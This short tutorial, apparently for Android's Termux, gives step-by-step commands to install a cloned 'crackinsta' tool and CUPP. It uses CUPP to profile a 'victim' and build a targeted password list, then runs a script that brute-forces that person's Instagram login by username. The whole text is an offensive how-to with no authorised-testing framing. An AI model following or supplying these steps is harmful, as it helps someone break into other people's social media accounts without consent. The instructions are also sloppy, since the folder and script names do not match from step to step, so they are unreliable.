This tool is combained from
CUPP - Common User Passwords Profiler Tool
Crackinsta Tool
apt update && apt upgrade
pkg update
pkg install python3
pkg install python
pkg install git
git clone https://github.com/JTECHCODE/crackinsta.git
Tool Installed
ls (list all folders)
now instacrack folder appears
cd instacrack
pip install requests
pip install bs4
cupp.py tool used to create password list
python3 cupp.py
python3 cupp.py -h
python3 cupp.py -i
Now password list created for victim
Change the password file name as pass.txt
mv oldname newname
mv filename.txt pass.txt
Open the file content
cat pass.txt
instacrack.py tool used for brute force attack
python crack.py
Enter the username
Put the seconds between password
Now the tool started to crack the password
Now you wait for the right password